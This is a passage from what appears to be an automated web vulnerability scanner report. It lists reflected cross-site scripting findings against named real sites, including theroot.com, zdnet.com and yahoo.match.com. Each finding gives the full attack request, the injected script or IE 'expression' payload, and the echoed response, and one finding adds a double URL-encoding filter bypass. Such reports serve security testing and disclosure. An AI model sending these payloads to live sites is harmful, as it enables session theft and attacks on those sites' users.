Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:08:59 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:08:59 GMT; path=/
Set-Cookie: TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; domain=.t-mobile.com; path=/
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 22 Mar 2011 22:08:58 GMT
Connection: close
Content-Length: 41914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<a class="tablink" href="/Business/Information.aspx?tp=international_calling&amp;c36fa"style="x:expression(alert(1))"58285901747=1">
...[SNIP]...

1.237. http://www.theroot.com/views/where-have-all-sports-heroes-gone [GT1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theroot.com
Path:   /views/where-have-all-sports-heroes-gone

Issue detail

The value of the GT1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f871"><script>alert(1)</script>82fc202d0dc was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/where-have-all-sports-heroes-gone?GT1=380023f871"><script>alert(1)</script>82fc202d0dc HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Tue, 22 Mar 2011 21:53:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 22 Mar 2011 21:53:33 GMT
Date: Tue, 22 Mar 2011 21:53:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/where-have-all-sports-heroes-gone?GT1=380023f871"><script>alert(1)</script>82fc202d0dc"/>
...[SNIP]...

1.238. http://www.theroot.com/views/where-have-all-sports-heroes-gone [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theroot.com
Path:   /views/where-have-all-sports-heroes-gone

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4f7e"><script>alert(1)</script>e4651a2781e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viewsa4f7e"><script>alert(1)</script>e4651a2781e/where-have-all-sports-heroes-gone HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Last-Modified: Tue, 22 Mar 2011 21:53:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 22 Mar 2011 21:53:39 GMT
Date: Tue, 22 Mar 2011 21:53:39 GMT
Content-Length: 15644
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/viewsa4f7e"><script>alert(1)</script>e4651a2781e/where-have-all-sports-heroes-gone"/>
...[SNIP]...

1.239. http://www.theroot.com/views/where-have-all-sports-heroes-gone [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theroot.com
Path:   /views/where-have-all-sports-heroes-gone

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7b6"><script>alert(1)</script>cc02875ef7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/where-have-all-sports-heroes-gone2e7b6"><script>alert(1)</script>cc02875ef7c HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Tue, 22 Mar 2011 21:53:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 22 Mar 2011 21:53:46 GMT
Date: Tue, 22 Mar 2011 21:53:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/where-have-all-sports-heroes-gone2e7b6"><script>alert(1)</script>cc02875ef7c"/>
...[SNIP]...

1.240. http://www.theroot.com/views/where-have-all-sports-heroes-gone [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.theroot.com
Path:   /views/where-have-all-sports-heroes-gone

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3fcf"%3b936d8b0f7ab was submitted in the REST URL parameter 2. This input was echoed as b3fcf";936d8b0f7ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /views/where-have-all-sports-heroes-goneb3fcf"%3b936d8b0f7ab HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Tue, 22 Mar 2011 21:53:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 22 Mar 2011 21:53:50 GMT
Date: Tue, 22 Mar 2011 21:53:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...

o_prop8="";
o_prop9="";
o_prop10="";
o_prop11="";
o_prop12="0";
o_prop13="-0";
o_prop14="";
o_prop19="";
o_prop21="";
o_prop25="";
o_prop32="drupal";
o_hier1="views | where-have-all-sports-heroes-goneb3fcf";936d8b0f7ab | front";
o_hier2="theroot.com | views | where-have-all-sports-heroes-goneb3fcf";936d8b0f7ab | front";
o_campaign="";
o_state="";
o_zip="";
o_events="";
o_products="";
o_purchaseID="";
o_eVar1="";
o_e
...[SNIP]...

1.241. http://www.theroot.com/views/where-have-all-sports-heroes-gone [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theroot.com
Path:   /views/where-have-all-sports-heroes-gone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fa7b"><script>alert(1)</script>f59af81c750 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/where-have-all-sports-heroes-gone?3fa7b"><script>alert(1)</script>f59af81c750=1 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Tue, 22 Mar 2011 21:53:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 22 Mar 2011 21:53:36 GMT
Date: Tue, 22 Mar 2011 21:53:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/where-have-all-sports-heroes-gone?3fa7b"><script>alert(1)</script>f59af81c750=1"/>
...[SNIP]...

1.242. http://www.vxsecurityresearch.org/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vxsecurityresearch.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce96e"><script>alert(1)</script>0a27ed87058 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ce96e"><script>alert(1)</script>0a27ed87058=1 HTTP/1.1
Host: www.vxsecurityresearch.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 18:18:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 748


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Valkyrie-X Security Research - Offensive, Creative and Fun </title>
<MET
...[SNIP]...
<frame src="https://sites.google.com/site/valkyriexsecurityresearch//?ce96e"><script>alert(1)</script>0a27ed87058=1" frameborder="0" />
...[SNIP]...

1.243. http://www.vxsecurityresearch.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vxsecurityresearch.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 727a9"><script>alert(1)</script>d3a7ae1e29e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?727a9"><script>alert(1)</script>d3a7ae1e29e=1 HTTP/1.1
Host: www.vxsecurityresearch.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 18:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 759


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Valkyrie-X Security Research - Offensive, Creative and Fun </title>
<MET
...[SNIP]...
<frame src="https://sites.google.com/site/valkyriexsecurityresearch//favicon.ico?727a9"><script>alert(1)</script>d3a7ae1e29e=1" frameborder="0" />
...[SNIP]...

1.244. http://www.zdnet.com/blog/security/obama-site-hacked-redirected-to-hillary-clinton/1042 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/security/obama-site-hacked-redirected-to-hillary-clinton/1042

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd60c'%3bf08bdf48df4 was submitted in the REST URL parameter 4. This input was echoed as dd60c';f08bdf48df4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/security/obama-site-hacked-redirected-to-hillary-clinton/1042dd60c'%3bf08bdf48df4 HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:07:54 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Wed, 21-Mar-2012 22:07:54 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=998
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 98910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<script type="text/javascript">
(function() {
var toolbar = new CNB.Toolbar('toolbar-100417', {
'cid': '100417',
'serviceCid': 'zdsecurity_1042dd60c';f08bdf48df4',
'title': 'Obama site hacked; Redirected to Hillary Clinton',
'summary': 'With a day to go before a critical Pennsylvania Democratic primary, Barack Obama&rsquo;s team has been busy p
...[SNIP]...

1.245. http://yahoo.match.com/qsearch/qsearchdl.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yahoo.match.com
Path:   /qsearch/qsearchdl.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c9dc%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25229e959d0f2d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c9dc"style="x:expr/**/ession(alert(1))"9e959d0f2d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qsearch/qsearchdl.aspx?8c9dc%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25229e959d0f2d9=1 HTTP/1.1
Host: yahoo.match.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SECU=TID=526100&ESID=7e1c2140-a7b8-48fc-bc15-5ca983fb7fd1&THEME=84; MatchSession=CDTF=3/22/2011&UMID=811fd088-6cb9-4923-938d-19c8f3233ad2; __utmz=191932533.1300827941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MMTS=; OLN=OLNVAL=0; Match=CCount=1&CDate=3/22/2011; MatchSearch=SC08=&SC08a=&SC11=&SC01=1&SC02=2&SC07=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; dMatch=CCount=1&CDate=3/22/2011; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; LinkedAccountsLandingUrl=/login/login.aspx; dMatchSearch=SC01=1&SC02=2&SC07=&SC08=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; __utma=191932533.1516891893.1300827941.1300827941.1300827941.1; dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; __utmc=191932533; __utmb=191932533.10.10.1300827941; ppLoginReferer=http%3a%2f%2fyahoo.match.com%2fLogin%2fLinkedAccountsPassportReturn.aspx;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Mar 2011 22:12:35 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: MatchSearch=SC08=&SC08a=&SC11=&SC01=1&SC02=2&SC07=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; expires=Thu, 22-Mar-2012 22:12:33 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 120155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><title>
   Match.c
...[SNIP]...
<a href="/search/search.aspx?8c9dc"style="x:expr/**/ession(alert(1))"9e959d0f2d9=1&q=woman%2cmen%2c25%2c35&pn=1&rn=4&do=2&exec=NOGO&lid=521">
...[SNIP]...

1.246. http://yahoo.match.com/search/searchSubmit.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yahoo.match.com
Path:   /search/searchSubmit.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31623"style%3d"x%3aexpr/**/ession(alert(1))"b536bbed5bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31623"style="x:expr/**/ession(alert(1))"b536bbed5bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/searchSubmit.aspx?31623"style%3d"x%3aexpr/**/ession(alert(1))"b536bbed5bf=1 HTTP/1.1
Host: yahoo.match.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SECU=TID=526100&ESID=7e1c2140-a7b8-48fc-bc15-5ca983fb7fd1&THEME=84; MatchSession=CDTF=3/22/2011&UMID=811fd088-6cb9-4923-938d-19c8f3233ad2; __utmz=191932533.1300827941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MMTS=; OLN=OLNVAL=0; Match=CCount=1&CDate=3/22/2011; MatchSearch=SC08=&SC08a=&SC11=&SC01=1&SC02=2&SC07=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; dMatch=CCount=1&CDate=3/22/2011; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; LinkedAccountsLandingUrl=/login/login.aspx; dMatchSearch=SC01=1&SC02=2&SC07=&SC08=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; __utma=191932533.1516891893.1300827941.1300827941.1300827941.1; dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; __utmc=191932533; __utmb=191932533.10.10.1300827941; ppLoginReferer=http%3a%2f%2fyahoo.match.com%2fLogin%2fLinkedAccountsPassportReturn.aspx;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Mar 2011 22:09:55 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: MatchSearch=SC08=&SC08a=&SC11=&SC01=1&SC02=2&SC07=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; expires=Thu, 22-Mar-2012 22:09:55 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><title>
   Match.c
...[SNIP]...
<a href="/search/search.aspx?31623"style="x:expr/**/ession(alert(1))"b536bbed5bf=1&exec=NOGO&lid=521">
...[SNIP]...

1.247. http://yahoo.match.com/search/searchSubmit.aspx [pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yahoo.match.com
Path:   /search/searchSubmit.aspx

Issue detail

The value of the pn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86589"style%3d"x%3aexpr/**/ession(alert(1))"7f84ea88a33 was submitted in the pn parameter. This input was echoed as 86589"style="x:expr/**/ession(alert(1))"7f84ea88a33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/searchSubmit.aspx?pn=186589"style%3d"x%3aexpr/**/ession(alert(1))"7f84ea88a33&rn=4&do=2&sb=1&lid=108 HTTP/1.1
Host: yahoo.match.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SECU=TID=526100&ESID=7e1c2140-a7b8-48fc-bc15-5ca983fb7fd1&THEME=84; MatchSession=CDTF=3/22/2011&UMID=811fd088-6cb9-4923-938d-19c8f3233ad2; __utmz=191932533.1300827941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MMTS=; OLN=OLNVAL=0; Match=CCount=1&CDate=3/22/2011; MatchSearch=SC08=&SC08a=&SC11=&SC01=1&SC02=2&SC07=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; dMatch=CCount=1&CDate=3/22/2011; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; LinkedAccountsLandingUrl=/login/login.aspx; dMatchSearch=SC01=1&SC02=2&SC07=&SC08=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; __utma=191932533.1516891893.1300827941.1300827941.1300827941.1; dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; __utmc=191932533; __utmb=191932533.10.10.1300827941; ppLoginReferer=http%3a%2f%2fyahoo.match.com%2fLogin%2fLinkedAccountsPassportReturn.aspx;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Mar 2011 22:10:21 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: MatchSearch=SC08=&SC08a=&SC11=&SC01=1&SC02=2&SC07=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; expires=Thu, 22-Mar-2012 22:10:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 111186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><title>
   Match.c
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/5480.iac.match/m/' + adzone + ';sz=' + adwidth + 'x' + adheight + ';tile=1;bid=1024779;log=0;gp=2;subid=2;subid=b5;pn=186589"style="x:expr/**/ession(alert(1))"7f84ea88a33;ubid=0;s=mt;pos=bom;ord=' + ord + '?" target="_blank">
...[SNIP]...

1.248. http://yahoo.match.com/search/searchSubmit.aspx [pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yahoo.match.com
Path:   /search/searchSubmit.aspx

Issue detail

The value of the pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ffab'%3balert(1)//07848157aa1 was submitted in the pn parameter. This input was echoed as 3ffab';alert(1)//07848157aa1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/searchSubmit.aspx?pn=13ffab'%3balert(1)//07848157aa1&rn=4&do=2&sb=1&lid=108 HTTP/1.1
Host: yahoo.match.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SECU=TID=526100&ESID=7e1c2140-a7b8-48fc-bc15-5ca983fb7fd1&THEME=84; MatchSession=CDTF=3/22/2011&UMID=811fd088-6cb9-4923-938d-19c8f3233ad2; __utmz=191932533.1300827941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MMTS=; OLN=OLNVAL=0; Match=CCount=1&CDate=3/22/2011; MatchSearch=SC08=&SC08a=&SC11=&SC01=1&SC02=2&SC07=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; dMatch=CCount=1&CDate=3/22/2011; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; LinkedAccountsLandingUrl=/login/login.aspx; dMatchSearch=SC01=1&SC02=2&SC07=&SC08=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; __utma=191932533.1516891893.1300827941.1300827941.1300827941.1; dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; __utmc=191932533; __utmb=191932533.10.10.1300827941; ppLoginReferer=http%3a%2f%2fyahoo.match.com%2fLogin%2fLinkedAccountsPassportReturn.aspx;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Mar 2011 22:10:41 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: MatchSearch=SC08=&SC08a=&SC11=&SC01=1&SC02=2&SC07=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; expires=Thu, 22-Mar-2012 22:10:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><title>
   Match.c
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/5480.iac.match/m/' + adzone + ';sz=728x90,' + adwidth + 'x' + adheight + ';tile=1;bid=1024779;log=0;gp=2;subid=2;subid=b5;pn=13ffab';alert(1)//07848157aa1;ubid=0;s=mt;pos=bom;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

1.249. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 8abfc<script>alert(1)</script>aa9ece6f440 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

